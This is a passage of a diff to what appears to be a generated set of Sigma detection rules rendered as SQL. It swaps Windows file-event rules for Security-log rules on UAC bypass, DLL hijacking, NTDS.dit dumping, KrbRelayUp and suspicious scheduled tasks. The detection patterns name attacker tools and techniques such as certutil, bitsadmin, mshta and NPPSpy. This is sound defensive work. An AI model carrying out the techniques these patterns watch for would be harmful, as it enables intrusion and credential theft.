'%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' 
OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + "SELECT * 
FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", + "title": "Hidden Local User Creation", + "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.privilege_escalation" + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "TeamViewer Remote Session", - "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", - "status": "test", - 
"description": "Detects the creation of log files during a TeamViewer remote session", + "title": "Account Tampering - Suspicious Failed Logon Reasons", + "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "status": "experimental", + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Legitimate uses of TeamViewer in an organisation" + "User using a disabled account" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" ], - "filename": "file_event_win_susp_teamviewer_remote_session.yml" + "filename": "win_security_susp_failed_logon_reasons.yml" }, { - "title": "Creation Of Non-Existent System DLL", - "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", + "title": "Suspicious Scheduled Task Creation", + "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Detects the creation of system dlls that are not present on the system. Usually to achieve dll hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", + "description": "Detects suspicious scheduled task creation events. 
Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", + "attack.execution", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' 
ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_create_non_existent_dlls.yml" + "filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", - "status": "experimental", - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" - ], + "title": "Locked Workstation", + "id": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", + "status": "stable", + "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. 
Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", + "author": "Alexandr Yampolskyi, SOC Prime", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4800')" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_workstation_was_locked.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", - "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", - "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "title": "Failed Code Integrity Checks", + "id": "470ec5fa-7b4e-4071-b200-4c753100f49b", + "status": "stable", + "description": "Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027.001" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." 
+ "Disk device errors" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('5038', '6281'))" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + "filename": "win_security_susp_codeintegrity_check_failure.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Admin User Remote Logon", + "id": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "status": "test", + "description": "Detect remote login by Administrator user (depending on internal pattern).", + "author": "juju4", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.t1078.001", + "attack.t1078.002", + "attack.t1078.003", + "car.2016-04-005" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Legitimate administrative activity." 
], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND AuthenticationPackageName = 'Negotiate' AND TargetUserName LIKE 'Admin%' ESCAPE '\\')" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_admin_rdp_login.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", "status": "test", - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": 
"win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Service Installed By Unusual Client - Security", + "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Suspicious NTDS.DIT Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", - "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - 
"attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", - "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "title": "KrbRelayUp Attack Pattern", + "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "status": "experimental", + "description": "Detects logon events that have 
characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.credential_access" ], "falsepositives": [ 
@@ -39375,1280 +39406,1325 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "New Outlook Macro Created", - "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "@ScoubiMtl", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "User genuinely creates a VB Macro for their email" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_outlook_macro_creation.yml" + 
"filename": "win_security_susp_psexec.yml" }, { - "title": "VsCode Powershell Profile Modification", - "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", - "status": "experimental", - "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD User Enumeration", + "id": "ab6bffca-beff-4baa-af11-6733f296d57a", + "status": "test", + "description": "Detects access to a domain user from a non-machine account", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Legitimate use of the profile by developers or administrators" + "Administrators configuring new users." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_vscode_powershell_profile.yml" + "filename": "win_security_ad_user_enumeration.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "title": "Tap Driver Installation - Security", + "id": "9c8afa4d-0022-48f0-9456-3712466f9701", "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ "attack.exfiltration", - "attack.t1567.002" + "attack.t1048" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_tap_driver_installation.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "title": "Azure AD Health Monitoring Agent Registry Keys Access", + "id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", + "author": "Roberto Rodriguez 